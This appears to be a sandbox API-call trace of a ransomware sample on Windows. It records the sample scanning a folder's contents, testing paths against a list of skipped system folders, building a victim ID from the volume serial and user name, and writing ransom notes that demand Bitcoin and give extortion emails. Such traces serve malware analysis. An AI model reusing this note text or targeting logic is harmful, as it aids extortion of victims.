	[0169.269] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.269] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.269] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.270] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0169.270] CloseHandle (hObject=0x388) returned 1
	[0169.270] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e6bbd1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.271] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*") returned 58
	[0169.271] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.271] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*", cchLength=0x3a | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*") returned 0x3a
	[0169.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.271] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="windows") returned 0x0
	[0169.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="boot") returned 0x0
	[0169.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="system volume information") returned 0x0
	[0169.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="temp") returned 0x0
	[0169.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="program files") returned 0x0
	[0169.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="appdata") returned 0x0
	[0169.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="application data") returned 0x0
	[0169.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.274] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="winnt") returned 0x0
	[0169.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.274] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="tmp") returned 0x0
	[0169.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.274] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="cache") returned 0x0
	[0169.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.275] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="webcache") returned 0x0
	[0169.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="inetcache") returned 0x0
	[0169.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="nvidia") returned 0x0
	[0169.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="packages") returned 0x0
	[0169.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="cookies") returned 0x0
	[0169.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="programdata") returned 0x0
	[0169.362] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.362] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.362] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e6bbd1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.362] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.362] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e6bbd1d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e6bbd1d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e6bbd1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.363] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e695e68, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e695e68, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e6bbd1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.363] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e695e68, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e695e68, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e6bbd1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0169.363] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.363] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.364] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd17b1a49, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x36edfa80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="parse.dat", cAlternateFileName="")) returned 1
	[0169.364] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sideload", cAlternateFileName="")) returned 1
	[0169.364] lstrcmpW (lpString1="Sideload", lpString2="..") returned 1
	[0169.364] lstrcmpW (lpString1="Sideload", lpString2=".") returned 1
	[0169.364] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0169.364] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0169.364] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="Sideload" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload"
	[0169.364] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload"
	[0169.365] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\"
	[0169.365] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\"
	[0169.365] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*"
	[0169.365] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0169.367] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*") returned 51
	[0169.367] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.367] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*") returned 0x33
	[0169.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.368] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="windows") returned 0x0
	[0169.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.368] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="boot") returned 0x0
	[0169.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.370] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="system volume information") returned 0x0
	[0169.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.370] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="temp") returned 0x0
	[0169.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="program files") returned 0x0
	[0169.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="appdata") returned 0x0
	[0169.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="application data") returned 0x0
	[0169.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="winnt") returned 0x0
	[0169.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="tmp") returned 0x0
	[0169.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="cache") returned 0x0
	[0169.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.373] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.374] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="webcache") returned 0x0
	[0169.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.374] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="inetcache") returned 0x0
	[0169.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="nvidia") returned 0x0
	[0169.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="packages") returned 0x0
	[0169.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.375] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="cookies") returned 0x0
	[0169.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.376] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="programdata") returned 0x0
	[0169.376] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.376] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.376] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0169.376] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0169.377] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload"
	[0169.377] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*"
	[0169.377] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.378] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.378] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\HELP_DECRYPT_YOUR_FILES.TXT") returned 75
	[0169.378] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.380] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.380] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.383] CloseHandle (hObject=0x388) returned 1
	[0169.384] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.385] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0169.387] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.388] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.388] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.388] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.388] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0169.389] CloseHandle (hObject=0x388) returned 1
	[0169.389] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.390] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.390] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.390] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\HELP_DECRYPT_YOUR_FILES.HTML") returned 76
	[0169.390] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.391] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.391] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0169.394] CloseHandle (hObject=0x388) returned 1
	[0169.396] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.397] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.398] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0169.460] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.460] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.461] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.461] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
